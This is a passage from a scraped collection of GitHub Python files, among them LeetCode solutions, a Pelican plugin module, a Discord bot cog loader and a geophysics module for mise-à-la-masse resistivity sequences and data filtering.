normalized_str = ''\n\n for c in paragraph:\n if c.isalnum():\n normalized_str += c\n else:\n normalized_str += ' '\n\n _map = collections.defaultdict(int)\n maxCount = 0\n res = ''\n\n for word in normalized_str.split():\n word = word.lower()\n\n if word in banned:\n continue\n\n _map[word] += 1\n\n if maxCount < _map[word]:\n maxCount = _map[word]\n res = word\n\n return res","repo_name":"sindhuvahinis/leetcode","sub_path":"2020/74.py","file_name":"74.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28720353411","text":"# Given a string, return a version without the first and last char, so \"Hello\" yields \"ell\". The string length will be at least 2.\n\n\n# withoutEnd(\"Hello\") → \"ell\"\n# withoutEnd(\"java\") → \"av\"\n# withoutEnd(\"coding\") → \"odin\"\n\n\ndef word(a):\n\tn=len(a)\n\tb=a[1:n-1]\n\treturn b\n\na=input(\"Enter the word:\")\nprint(word(a))","repo_name":"aamiriqbal071/CodingBat","sub_path":"String-1/withoutEnd.py","file_name":"withoutEnd.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36413597550","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandle registration and setup for plugin\n\"\"\"\nimport logging\nfrom blinker import signal\nfrom .content_adapter import GitContentAdapter\nfrom pelican import signals\n\nDEV_LOGGER = logging.getLogger(__name__)\n\ncontent_git_object_init = signal('content_git_object_init')\n\ndef send_content_git_object_init(content):\n content_git_object_init.send(content, git_content=GitContentAdapter(content))\n\n\ndef setup_option_defaults(pelican_inst):\n pelican_inst.settings.setdefault('GIT_FILETIME_FROM_GIT', True)\n pelican_inst.settings.setdefault('GIT_HISTORY_FOLLOWS_RENAME', True)\n pelican_inst.settings.setdefault('GIT_SHA_METADATA', True)\n pelican_inst.settings.setdefault('GIT_GENERATE_PERMALINK', False)\n\n\ndef register():\n signals.content_object_init.connect(send_content_git_object_init)\n signals.initialized.connect(setup_option_defaults)\n\n # Import actions\n from . import actions\n","repo_name":"getpelican/pelican-plugins","sub_path":"filetime_from_git/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1367,"dataset":"github-code","pt":"37"} +{"seq_id":"34425267818","text":"# link : https://leetcode.com/problems/koko-eating-bananas/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution:\n def minEatingSpeed(self, piles: List[int], h: int) -> int:\n mx = max(piles)\n if len(piles) == h:\n return mx\n left,right = 1,mx\n res = mx\n while left <= right:\n mid = (left+right) // 2\n k = 0\n for i in piles:\n k+=ceil(i/mid)\n if k <= h: \n res = min(res,mid)\n right = mid-1\n else:\n left = mid+1\n return res\n \n \n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"Searching Algorithms/BinarySearch/Problems/875. Koko Eating Bananas.py","file_name":"875. Koko Eating Bananas.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22239782951","text":"class Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return a list of length 2, [index1, index2]\n def searchRange(self, A, target):\n i = 0\n j = len(A) - 1\n while i <= j:\n mid = (i + j) / 2\n if target == A[mid]:\n low = high = mid\n while low >= 0 and target == A[low]:\n low -= 1\n while high < len(A) and target == A[high]:\n high += 1\n return [low + 1, high - 1]\n elif target > A[mid]:\n i = mid + 1\n else:\n j = mid - 1\n return [-1, -1]","repo_name":"zhexiong/LTC","sub_path":"search_for_a_range.py","file_name":"search_for_a_range.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16865305678","text":"from typing import List\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n # 深度优先遍历+回溯+剪枝\n self.res = []\n track = []\n\n def traceback(s: int, track: List[int]):\n if s == target: # 得到一个合法结果\n self.res.append(track[:])\n return\n if s > target: # 当前数字和已经大于目标, 剪枝\n return\n\n for num in candidates: # 遍历候选列表\n if not track or num >= track[-1]: # 为避免重复, 保证track是单调不减序列\n track.append(num)\n traceback(s + num, track) # 向下递归\n track.pop() # 回溯\n\n traceback(0, track)\n return self.res\n","repo_name":"tangxyw/LeetCode","sub_path":"python/Traceback/[39]组合总和.py","file_name":"[39]组合总和.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33090204770","text":"import os\nimport logging\nimport logging.config\n\n\nlogger = None\n_logs_path = '/tmp/ipcam'\n_logger_conf_file = 'logger.conf'\n_logger_name = 'root'\n\n\ndef init_logger():\n global logger\n if not os.path.exists(_logs_path):\n os.mkdir(_logs_path)\n logger_conf_path = os.path.abspath(os.path.join(os.path.dirname(__file__), _logger_conf_file))\n logging.config.fileConfig(logger_conf_path)\n logger = logging.getLogger(_logger_name)\n\n\ninit_logger()\n\n_ctx = None\n\n\ndef setContext(ctx):\n global _ctx\n logger.info(\"=========Context set=========\")\n _ctx = ctx\n\n\ndef getContext():\n global _ctx\n return _ctx\n\n\nclass Context(object):\n def __init__(self, conf, reporter):\n self.conf = conf\n self.reporter = reporter\n","repo_name":"zhoujohn/Elec_Solution2","sub_path":"context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26969416267","text":"import discord, os\nfrom discord.ext import commands\nfrom last_fork.config import settings\nfrom colorama import init, Fore\n\nintents = discord.Intents.default()\nintents.members = True\nclient = commands.Bot(command_prefix = \"*\", intents=intents)\nclient.remove_command(\"help\")\n\n@client.command()\nasync def load(ctx, extension):\n\tclient.load_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} loaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} loaded {extension}')\n\n@client.command()\nasync def unload(ctx, extension):\n\tclient.unload_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} unloaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} unloaded {extension}')\n\n@client.command()\nasync def reload(ctx, extension):\n\tclient.unload_extension(f'cogs.{extension}')\n\tclient.load_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} reloaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} reloaded {extension}')\n\nfor filename in os.listdir(\"./cogs\"):\n\tif filename.endswith(\".py\"):\n\t\tclient.load_extension(f'cogs.{filename[:-3]}')\n\t\tinit()\n\t\tprint(Fore.MAGENTA + f\"{filename[:-3]} \" + Fore.LIGHTBLACK_EX + \"loaded\")\n\nprint(Fore.BLUE + \"ALL EXTENSIONS \" + Fore.LIGHTBLACK_EX + \"loaded\")\n \nclient.run(settings['token'])","repo_name":"CatsAreGood1337/Discord-nuke-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"40911093955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport numpy as np\n\narr = np.array([[1,2],\n [3,4]])\neig_val, eig_vec = np.linalg.eig(arr)\ndeterminant = np.linalg.det(arr)\nprint(\"Eigenvalues : {}\".format(eig_val))\nprint(\"Eigenvectors : {}\".format(eig_vec))\nprint(\"Determinant : {}\".format(int(determinant)))\n\nvec1 = np.array([1,2,3])\nvec2 = np.array([4,5,6])\ncross_product = np.cross(vec1, vec2)\nprint(\"Cross product : {}\".format(cross_product))\nA = np.array([[1,2,-2],\n [2,1,-5],\n [1,-4,1]])\nB = np.array([-15,-21,18])\n\nx = np.linalg.solve(A,B)\nprint(\"Solution : {}\".format(x))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kimyeoungrok/HW7_KYR","sub_path":"Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1907105481","text":"import numpy as np\n\n#definitions\nCellWidth= 200\nCellHeight= 400\nServiceWidth= 400\nNoOfColumnAtLeft= 4\nNoOfColumnAtRight= 4\nNoOfRaw= 4\nDeltaYFromTop= 30\nCellHeightFromHead= 380\n\nNoOfColumn = NoOfColumnAtLeft + NoOfColumnAtRight\nNoOfTotalCells = (int) (NoOfColumn * NoOfRaw)\nfor i in range(NoOfTotalCells):\n idx = i+1\n innerColumn = ((idx - 1) % NoOfColumn) + 1\n innerRaw = np.floor ((idx - 1) / NoOfColumn)\n if innerColumn == 0:\n InnerColumn = NoOfColumn\n yPosition = innerRaw * CellHeight + DeltaYFromTop\n if innerColumn <= NoOfColumnAtLeft:\n xPosition = CellWidth * innerColumn - CellWidth / 2\n iD = innerRaw * NoOfColumnAtLeft + innerColumn\n if innerRaw == (NoOfRaw - 1):\n shelfNumber = 0\n else:\n shelfNumber = innerRaw + 1\n else:\n xPosition = CellWidth * innerColumn + ServiceWidth - CellWidth / 2\n iD = innerRaw * NoOfColumnAtRight + innerColumn - NoOfColumnAtLeft + 100\n if innerRaw == (NoOfRaw - 1):\n shelfNumber = 0\n else:\n shelfNumber = innerRaw + NoOfRaw\n height = CellHeightFromHead\n tarr = [int(height), int(xPosition), int(yPosition), int(iD), int(shelfNumber)]\n print(\"new AppConfigSvc.CellDefinition() {{ HeightMM = {0}, XPosMM = {1}, YPosMM = {2}, cellId = {3}, shelfNumber = {4} }},\".format(tarr[0], tarr[1], tarr[2], tarr[3], tarr[4]))\n","repo_name":"doronweiss/pythontesta","sub_path":"Bitncam/cellsconfig.py","file_name":"cellsconfig.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21340173982","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 23 15:11:21 2020\n@author: Benjamin\n\"\"\"\nfrom pygimli.meshtools import readGmsh\nimport numpy as np\nimport pybert as pb\nimport os \nfrom pygimli.viewer.mpl import drawStreams\nfrom scipy import interpolate\nimport matplotlib.pyplot as plt\nimport pygimli as pg\n \nclass fct_utils(): \n\n def definePath(main,date,**kwargs):\n #%% define PATHS \n # or set you working directory local path here \n #main = os.getcwd()\n #os.chdir(main)\n \n geomPath= './geom/'\n meshPath= './mesh/'\n icsdPath= './icsd/'\n figPath= './fig/'\n processedPath= './processed_data/'\n \n rmvInvalid = False\n all_gates = False\n Nfix = False\n gateIP = False\n \n icsdPath += date \n if rmvInvalid is False: \n icsdPath += '_raw' \n if all_gates: \n icsdPath += '_AllG' \n if Nfix: \n icsdPath += '_Nfix' \n if gateIP: \n icsdPath += '_M' + str(gateIP)\n icsdPath += '/'\n \n figPath += date + '/'\n if not os.path.exists(figPath):\n os.makedirs(figPath)\n\n processedPath += date + '/'\n if not os.path.exists(processedPath):\n os.makedirs(processedPath)\n \n \n return geomPath, meshPath, icsdPath, figPath, processedPath\n\n\n#%% ------- MALM -----------------------------------------------------####\n\n def mk_seqMALM(a_injection = 72, b_return = 2, sensors=None, mesh=None, \n Syscal=None, Rec=None, \n PosXYZid=None,Ch_return=None, \n mfix=False, Bmove=(False,[]), mref=40,\n savefig=False,SaveName=None):\n \n \"\"\"\n write the rhizotron malm sequence\n parameters:\n ===\n * a_injection: number of the electrode used for injection (t: int) , default = 1\n * b_return: number of the electrode used as return (t: int), default = 2\n * b_return associated with Ch_return --> b_return_left = b_return[0], while b_return_right = b_return[1] \n returns:\n ===\n * seq: malm sequence (t: np.ndarray)\n \"\"\"\n print('*' * 20)\n\n # function \n a = a_injection -1 \n b= b_return - 1 \n\n seq = []\n \n if mfix==True:\n m = mref -1\n electrodes = np.arange(1,len(sensors))\n for row in electrodes:\n print(row)\n n = row\n seq.append([a, b, m, n]) \n\n \n else:\n # horizontal\n electrodes = np.arange(0,72)\n electrodes = electrodes.reshape((9,8))\n for row in electrodes:\n for i in range(len(row) -1):\n m = row[i]\n n = row[i + 1]\n seq.append([a, b, m, n])\n \n # vertical\n rotated_electrodes = np.flipud(np.rot90(electrodes))\n for row in rotated_electrodes:\n for i in range(len(row) -1):\n m = row[i]\n n = row[i + 1]\n seq.append([a, b, m, n])\n \n # diag \\ -6 : 6\n for d in range(-6, 7):\n diagonal = np.diag(electrodes, k = d)\n for i in range(len(diagonal) - 1):\n m = diagonal[i]\n n = diagonal[i + 1]\n seq.append([a, b, m, n])\n \n # diag / \n flipped_electrodes = np.fliplr(electrodes)\n for d in range(-6, 7):\n diagonal = np.diag(flipped_electrodes, k = d)\n for i in range(len(diagonal) - 1):\n m = diagonal[i]\n n = diagonal[i + 1]\n seq.append([a, b, m, n])\n \n # remove where the same electrode appears twice\n sequence = np.array(seq)\n\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n\n\n id2Remove=[]\n if PosXYZid is not None:\n print('-' * 5)\n print('Split case remove wrong quadripoles and adapt return electrode')\n PosXYZid=np.array(PosXYZid)\n Left=np.array(PosXYZid[0,:]) \n Right=np.array(PosXYZid[1,:]) \n print('TEST1: IF M and N are on the same SIDE')\n print('TEST2: IF B return same side as M and N')\n for i in range(0,len(sequence_clean)):\n # check if line ismenber of left or right\n # ---------# \n # 1st TEST #\n # TEST IF M and N are on the same SIDE\n # ---------# \n# print(sequence_clean[i, 2:4])\n Left_Test = any(elem in sequence_clean[i, 2:4]+1 for elem in Left)\n Right_Test = any(elem in sequence_clean[i, 2:4]+1 for elem in Right) \n #print('Left_Test=' + str(Left_Test) + ' Right_Test=' + str(Right_Test))\n if i in id2Remove:\n continue\n try:\n if all([Left_Test,Right_Test])==True:\n id2Remove.append(i)\n except:\n continue \n\n if Ch_return is not None:\n # ---------# \n # 2nd TEST #\n # TEST IF B return same side as M and N \n # ---------# \n B_Test = b_return in Left\n if (B_Test==False and Left_Test==True):\n sequence_clean[i, 1]=Ch_return\n \n print('sequence before removed split=' + str(len(sequence_clean)))\n sequence_clean= np.delete(sequence_clean,id2Remove, axis=0)\n print('sequence after removed split=' + str(len(sequence_clean)))\n \n # remove where the same electrode appears twice\n sequence = np.array(sequence_clean)\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n print(indices_delete)\n \n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n\n if Bmove[0]==True:\n sequence_clean_base= sequence_clean\n for b in Bmove[1]:\n print('b=' + str(b))\n for i in range(0,len(sequence_clean_base)):\n sequence_clean_b= sequence_clean_base\n #print(i,b)\n sequence_clean_b[i, 1]=b\n sequence_clean= np.vstack([sequence_clean,sequence_clean_b])\n\n # remove where the same electrode appears twice\n sequence = np.array(sequence_clean)\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n \n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n \n if Rec==True:\n print('add rec')\n sequence_cleanR=sequence_clean[:,[2,3,0,1]] \n sequence_clean= np.vstack([sequence_clean,sequence_cleanR])\n \n schemeMALM = pb.DataContainerERT()\n schemeMALM.resize(len(sequence_clean)) \n for i, j in enumerate(\"abmn\"):\n schemeMALM.set(j, sequence_clean[:, i])\n\n\n if mesh!=None: \n sensors=[]\n posXYZ=[]\n for node in mesh.nodes():\n if node.marker() == -99:\n sensors.append(node.pos())\n posXYZ.append(np.array(node.pos()))\n\n if len(sensors)>0: \n schemeMALM.setSensorPositions(sensors)\n schemeMALM.set(\"valid\", np.ones(len(sequence_clean)))\n if PosXYZid is not None:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs_splitted.shm')\n else:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs.shm')\n \n \n schemeMALM.setSensorPositions(sensors)\n schemeMALM.set(\"valid\", np.ones(len(sequence_clean)))\n if PosXYZid is not None:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs_splitted.shm')\n else:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs.shm')\n \n if Syscal==True:\n print('Write syscal sequence file')\n posXYZ= np.vstack(posXYZ)\n posXYZ_ElectrPro= [np.arange(1,len(posXYZ)+1),np.zeros([2,len(posXYZ[:,0])])]\n posXYZ_ElectrPro= np.vstack(posXYZ_ElectrPro).T\n nb = np.arange(1,len(posXYZ_ElectrPro)+1)\n posXYZ_nb= np.column_stack((nb,posXYZ_ElectrPro))\n measSyScal= sequence_clean+1\n nb = np.arange(1,len(measSyScal)+1)\n measSyScal_nb= np.column_stack((nb,measSyScal))\n if PosXYZid is not None:\n fileName='MALMR'+ str(np.amax(measSyScal)) +'_Splitted.txt'\n else:\n fileName='MALMR'+ str(np.amax(measSyScal)) +'.txt'\n f = open(fileName,'w')\n np.savetxt(f, posXYZ_nb, fmt='%d %1.2f %1.2f %1.2f', delimiter='\\t',header='X Y Z') # X is an array\n np.savetxt(f, measSyScal_nb, fmt='%d', delimiter='\\t',header='A\t B\t M\t N') # X is an array\n f.close()\n\n if savefig==True:\n plt.ioff()\n fig = plt.figure()\n sensorsArray = np.vstack(sensors)\n from celluloid import Camera\n camera = Camera(plt.figure())\n for qq in np.arange(0,len(sequence_clean),int(np.round(len(sequence_clean)/72))):\n plt.scatter(sensorsArray[:,0],sensorsArray[:,1],color='b',alpha=0.2)\n plt.scatter(sensors[sequence_clean[qq,1]][0],sensors[sequence_clean[qq,1]][1],color='r',alpha=0.9)\n plt.scatter(sensors[sequence_clean[qq,2]][0],sensors[sequence_clean[qq,2]][1],color='g',alpha=0.9)\n plt.scatter(sensors[sequence_clean[qq,3]][0],sensors[sequence_clean[qq,3]][1],color='g',alpha=0.9)\n camera.snap()\n anim = camera.animate(blit=True) #interval=200,\n if PosXYZid is not None:\n AnimName='SeqMALMGifDescription_Splitted.mp4'\n else:\n AnimName='SeqMALMGifDescription.mp4'\n anim.save(AnimName)\n plt.close(fig)\n\n return(sequence_clean)\n \n\n def PrepareMALMData(DataName, Rec=False, \n MinV=1e-6, MaxRc=1e4, DevErr=5, Kfact=1e3, MinMaxAppRes=1e3, Rscheck=50,\n SwE=False, ExpRec=True, gIP=None, RmvE=None,\n valid=None,**kwargs):\n \"\"\"\n Prepare MALM data for ICSD analysis\n \n parameters:\n ===\n return:\n ===\n \"\"\"\n if type(DataName) is str:\n Obs = pb.importer.importSyscalPro(DataName) \n Obs.set('r', Obs('u')/Obs('i'))\n Obs.set('Rec',np.zeros(len(Obs('u'))))\n else: \n Obs = DataName\n DataName = 'test'\n \n print(\"Data before filtering:\", Obs)\n process_folder = os.getcwd()\n savefile=False\n for key, value in kwargs.items():\n if key == 'savefile':\n savefile = value\n if key == 'date':\n date = value\n process_folder = './processed_data/' + date +'/' \n \n if not os.path.exists(process_folder):\n os.makedirs(process_folder)\n if key == 'NameSave':\n NameSave = value\n \n \n if Rec==True:\n sC = Obs.sensorCount()\n # Build an unique Index list for one measurement direction:\n idxF = Obs('a')*sC**3 + Obs('b')*sC**2 + Obs('m')*sC**1 + Obs('n')\n # Build a second Index list for reciprocal measurement direction:\n idxR = Obs('m')*sC**3 + Obs('n')*sC**2 + Obs('a')*sC**1 + Obs('b')\n # for each measurement in idxF search the same idx in idxR which is your reciprocal\n #threshold=5\n recip_err=[]\n count=0\n idc2Skip = [] # search for duplicates reciprocals \n for i, dr in enumerate(idxF):\n if i in idc2Skip:\n recip_err.append(0)\n else:\n idc= np.where(dr==idxR)[0]\n if idc.size>0:\n count = count + 1\n R_dif = np.abs(Obs('r')[i] - Obs('r')[idc[0]])\n R_avg = (Obs('r')[i] + Obs('r')[idc[0]]) / 2\n recip_err.append(np.abs(R_dif / R_avg) * 100)\n idc2Skip.append(idc[0])\n else:\n recip_err.append(0)\n Dup_Vec_Bool= np.zeros([len(Obs('a'))])\n Dup_Vec_Bool[idc2Skip]=1\n\n\n idDouble = [] # search for doubles quadrupoles \n for i, dr in enumerate(idxF):\n idc= np.where(dr==idxF)[0]\n if idc.size>1:\n idDouble.append(1)\n else:\n idDouble.append(0)\n\n if ExpRec==True:\n print('Write reciprocal file') \n\n\n Obs.set('RecBool',Dup_Vec_Bool)\n Obs.set('Double',idDouble)\n Obs.markInvalid(Obs('Double') == 1)\n Obs.removeInvalid()\n print(\"Data after filtering double\", Obs)\n\n Obs.markInvalid(Obs('err') > DevErr)\n Obs.removeInvalid()\n print(\"Data after filtering contact resistance:\", Obs)\n\n Obs.markInvalid(Obs('Rec') > MaxRc)\n Obs.removeInvalid()\n print(\"Data after filtering rec threshold:\", Obs)\n Obs.markInvalid(Obs('RecBool') == 1)\n Obs.removeInvalid()\n print(\"Data after remove rec:\", Obs)\n \n print(\"Data after filtering:\", Obs)\n\n if RmvE is not None:\n Obs.set('RmvE_Vec_Bool',RmvE)\n Obs.markInvalid(Obs('RmvE_Vec_Bool') == 1)\n Obs.removeInvalid()\n print(\"Data after RmvE:\", Obs)\n\n \n if SwE==True:\n print('Switch electrode pair')\n IdColElecSwE_1=[]\n IdColElecSwE_2=[]\n for iSwE in enumerate(SwE):\n print(iSwE)\n for i, j in enumerate(\"abmn\"):\n IdLineElecSwE_1= np.where(iSwE[1][0]-1==np.array(Obs(j)))[0]\n IdLineElecSwE_2= np.where(iSwE[1][1]-1==np.array(Obs(j)))[0]\n IdColElecSwE_1.append(IdLineElecSwE_1)\n IdColElecSwE_2.append(IdLineElecSwE_2)\n for i, j in enumerate(\"abmn\"):\n Obs(j)[IdColElecSwE_1[i][:]]=[iSwE[1][1]-1]*np.ones(len(IdColElecSwE_1[i][:]))\n Obs(j)[IdColElecSwE_2[i]]=[iSwE[1][0]-1]*np.ones(len(IdColElecSwE_2[i][:]))\n Obs.set('a', Obs('a'))\n Obs.set('b', Obs('b'))\n Obs.set('m', Obs('m'))\n Obs.set('n', Obs('n'))\n \n \n if valid is not None:\n Obs.set('valid',valid)\n Obs.removeInvalid()\n print(\"Data after valid:\", Obs)\n\n \n if savefile==True: \n if gIP is not None: \n print('TDIP export')\n sep = '_'\n if NameSave is None:\n NameSave = process_folder + 'O'+ os.path.basename(DataName).split(sep, 1)[0] + 'M'+str(gIP) + '.txt'\n f = open(NameSave,'w')\n np.savetxt(f, np.array(Obs['m'+str(gIP)]), delimiter='\\t',fmt='%1.6f') # X is an array\n f.close()\n else:\n sep = '.'\n if NameSave is None:\n NameSave = process_folder + 'O'+ os.path.basename(DataName).split(sep, 1)[0] + '.txt'\n f = open(NameSave,'w')\n np.savetxt(f, np.array(Obs(\"r\")), delimiter='\\t',fmt='%1.6f') # X is an array\n f.close()\n print(NameSave)\n \n \n dataABMN = [np.array(Obs('a'))+1, np.array(Obs('b'))+1,\n np.array(Obs('m'))+1,np.array(Obs('n'))+1]\n dataABMN= np.vstack(dataABMN).T\n return [Obs, dataABMN]\n \n def VRTEpos(mesh=None,dim=3,MarkerVRTE=991):\n \"\"\"\n Find position of VRTE into the mesh\n \n parameters:\n ===\n * mesh_VRTs: the mesh with all virtuals sources included\n\n return:\n ===\n * VRTeCoord.txt : adequate file to be inverted into ICSD\n \"\"\"\n VRTE=[]\n Pos_vrtS=[]\n for node in mesh.nodes():\n if node.marker() == -MarkerVRTE:\n VRTE.append(node.pos())\n Pos_vrtS.append(np.array(node.pos()))\n print(str(len(VRTE)) + ' VRTEs found')\n Pos_vrtS= np.vstack(Pos_vrtS)\n \n # --- Writing the VRTe Coordinates into a file! ------------------------------\n \n f = open('VRTeCoord.txt','w')\n np.savetxt(f, Pos_vrtS[:,0:2], delimiter='\\t',fmt='%1.3f') # X is an array\n f.close()\n if dim==3:\n f = open('VRTeCoord.txt','w')\n np.savetxt(f, Pos_vrtS[:,0:3], delimiter='\\t',fmt='%1.3f') # X is an array\n f.close()\n return Pos_vrtS\n \n \n def mesh_import(fname):\n \"\"\"\n Import a gmsh mesh and return mesh and sensors positions according to markers\n Returns\n -------\n None.\n \n \"\"\"\n ## --------- Import mesh --------- ##\n mesh3d=readGmsh(fname, verbose=True)\n #mesh3d.exportVTK('mesh3d_Markers')\n #MR.PyMesh3d() # plot mesh3d_Markers marker in 3d\n sensors = []\n for node in mesh3d.nodes():\n if node.marker() == -99:\n sensors.append(node.pos())\n elif node.marker() == -999:\n print('-999')\n sensors.append(node.pos())\n elif node.marker() == -1000:\n print('-1000')\n sensors.append(node.pos())\n return mesh3d, np.vstack(sensors)\n\n\n def streamlines(coordObs, Obs, model, mesh=None, **kwargs):\n \"\"\"\n Current streamlines; interpolate model from mesh_inv to new mesh to build streamlines\n takes the gradient of the potential and multiply it by the interpolated resistivity model\n -------\n - mesh: mesh to compute the quiver plot\n \n \"\"\"\n mesh_inv = [] # medium conductivity\n for key, value in kwargs.items():\n if key == 'Xaxis':\n Xaxis = value \n if key == 'mesh_inv':\n mesh_inv = value\n if key == 'date':\n date = value\n \n xn = 30\n yn = 30\n\n xx = np.linspace(min(coordObs[:,0]), max(coordObs[:,0]),xn)\n yy = np.linspace(min(coordObs[:,1]), max(coordObs[:,1]),yn)\n\n xx, yy = np.meshgrid(xx, yy)\n points = np.transpose(np.vstack((coordObs[:,0], coordObs[:,1])))\n print(len(points))\n print(len(Obs))\n\n if mesh is None:\n mesh = pg.createGrid(x=np.linspace(min(coordObs[:,0]), max(coordObs[:,0]),xn),\n y=np.linspace(min(coordObs[:,1]), max(coordObs[:,1]),yn))\n\n u_interp = interpolate.griddata(points,\n Obs,\n (xx, yy), \n method='cubic')\n uu = np.reshape(u_interp,[xn*yn])\n #uu = pg.interpolate(mesh, (xx, yy), Obs, method='spline')\n\n \n if isinstance(model, float):\n stream = -pg.solver.grad(mesh, uu)*(1/model) \n #jj = -uu*(1/model)\n else: \n res = pg.interpolate(mesh, mesh_inv, model, method='spline')\n \n # pg.show(mesh, data=res, notebook=True, savefig='model_interpolated.png')\n \n # plotter, _ = pg.show(mesh_inv, data=model,\n # alpha=0.9, hold=True, notebook=True)\n # plotter.view_xy()\n # plotter.show()\n # plotter.screenshot('model3d.png')\n \n #jj = -uu*(1/res).array()\n stream = -pg.solver.grad(mesh, uu)*(1/res).array()[:, None]\n \n\n if kwargs.get('vmin'):\n vmin = kwargs.get('vmin')\n else: \n vmin = min(Obs)\n \n if kwargs.get('vmax'):\n vmax = kwargs.get('vmax')\n else: \n vmax = max(Obs)\n\n if kwargs.get('ax'):\n ax = kwargs.get('ax')\n else:\n fig, ax = plt.subplots()\n \n sc=ax.scatter(coordObs[:,0], coordObs[:,1], c=Obs, \n cmap ='coolwarm',s=5e2, vmin=vmin, vmax=vmax) # norm=matplotlib.colors.Normalize()\n cbar = plt.colorbar(sc,ax=ax)\n cbar.set_label('V') \n ax.set_ylabel('y [m]',fontsize=15)\n ax.set_xlabel('x [m]',fontsize=15)\n \n if len(kwargs.get('sensors'))>0:\n sensors = kwargs.get('sensors')\n ax.scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n for i in range(len(sensors[:,0])):\n ax.annotate(str(i+1), (sensors[i,0],sensors[i,1])) \n if kwargs.get('A'):\n A = kwargs.get('A')\n ax.scatter(sensors[A,0],sensors[A,1],color='y',marker='^',\n label='A. elec', s=5e2)\n if kwargs.get('B'):\n B = kwargs.get('B')\n ax.scatter(sensors[B,0],sensors[B,1],\n color='y',marker='v',label='B. elec', s=5e2)\n if kwargs.get('Nfix'):\n Nfix = kwargs.get('Nfix')\n ax.scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. elec')\n\n if kwargs.get('gridCoarse'):\n gridCoarse = pg.createGrid(x=np.linspace(min(sensors[:,0]), max(sensors[:,0]),xn/2),\n y=np.linspace(min(sensors[:,1]), max(sensors[:,1]),yn/2))\n \n\n drawStreams(ax, mesh, stream,\n color='green', quiver=True, linewidth=6.0)\n \n \n # save for TL analysis\n \n #j = -pg.solver.grad(mesh, uu) * (1/Res)\n #ax, _ = pg.show(mesh, hold=True, alpha=0.3)\n #drawStreams(ax, mesh, j)\n \n return mesh, uu, model\n\n def Ref_N_zeroP(ref_elec=71):\n \"\"\"\n The potential at the reference electrode is used as a zero potential\n and is removed to the electrical potential collected at each electrode\n Returns\n -------\n None.\n\n \"\"\"\n \n def plot_scatter_obs(x,y,V):\n \"\"\"\n Plot scattered potential\n Returns\n -------\n None.\n\n \"\"\"\n \n def load_geom(path):\n \"\"\" load the geometry of the acquisition (*geom file custum for Mise-à-la-masse data)\n \n Parameters\n ----------\n\n \"\"\"\n geom_files = [f for f in os.listdir(path) if f.endswith('.geom')]\n if len(geom_files) != 1:\n raise ValueError('should be only one geom file in the current directory')\n \n fileNameElec = geom_files[0] \n line_number = 0\n line_of_injection = []\n line_of_remotes = []\n # Open the file in read only mode\n with open(path + fileNameElec, 'r') as read_obj:\n # Read all lines in the file one by one\n for line in read_obj:\n # For each line, check if line contains the string\n # print(line)\n line_number += 1\n if ('#Remote') in line:\n # If yes, then add the line number & line as a tuple in the list\n line_of_remotes.append((line_number))\n if ('#Injection') in line:\n line_of_injection.append((line_number))\n \n # print(line_of_injection)\n # print(line_of_remotes)\n RemLineNb= int(line_of_remotes[0])-1\n Injection= int(line_of_injection[0])-1\n \n coordE = np.loadtxt(path+ fileNameElec)\n pointsE= np.vstack(coordE[:RemLineNb,1:4])\n \n return RemLineNb, Injection, coordE, pointsE\n\n def filterTDIP(dataTDIP,id2rmv):\n valid = 